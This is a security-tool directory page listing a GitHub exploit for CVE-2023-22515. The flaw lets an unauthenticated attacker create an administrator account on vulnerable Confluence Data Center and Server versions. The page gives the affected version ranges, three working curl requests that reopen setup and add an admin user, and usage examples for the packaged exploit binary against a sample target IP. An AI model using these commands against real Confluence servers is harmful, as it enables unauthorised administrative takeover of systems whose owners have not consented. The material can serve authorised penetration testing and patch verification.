Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-22515 — Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具 | Kitploit
Tools/GitHubGitHub/ad-calcium/cve-2023-22515
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationRed Teaming
GitHubad-calcium/cve-2023-22515

CVE-2023-22515

Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具

View Repository
110812 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Red Team Tool - Confluence Unauthorized Add Admin User (CVE-2023-22515) Exploit Tool

Vulnerability Scope

root@kitploit:~
8.0.0 <= Confluence Data Center and Confluence Server <= 8.0.4
8.1.0 <= Confluence Data Center and Confluence Server <= 8.1.4
8.2.0 <= Confluence Data Center and Confluence Server <= 8.2.3
8.3.0 <= Confluence Data Center and Confluence Server <= 8.3.2
8.4.0 <= Confluence Data Center and Confluence Server <= 8.4.2
8.5.0 <= Confluence Data Center and Confluence Server <= 8.5.1

Exploit

1. Normal access, prompt that setup is complete

root@kitploit:~
curl -vk http://IP/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false

2. Create admin user

root@kitploit:~
test123 Password2

Execute the following command

root@kitploit:~
curl -vk -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=test123&fullName=test123&email=test123@localhost&password=Password2&confirm=Password2&setup-next-button=Next" http://IP/setup/setupadministrator.action

3. Setup complete

root@kitploit:~
curl -vk -X POST -H "X-Atlassian-Token: no-check" http://IP/setup/finishsetup.action

Usage

root@kitploit:~
cve-2023-22515.exe
Usage of cve-2023-22515.exe:
  -pass string
        Specify the password to add
  -proxy string
        Set proxy
  -u string
        Specify the target
  -user string
        Specify the username to add

Random account password

root@kitploit:~
cve-2023-22515.exe -u http://10.108.3.117:8090

image-2023101116485852

Manually add admin user

root@kitploit:~
cve-2023-22515.exe -u http://10.108.3.117:8090 -user tesxe17 -pass Password2

image-20231011164858593

Changelog

root@kitploit:~
[+] 2023/10/16 Added random username and password

Star History

Star History Chart

Download Tool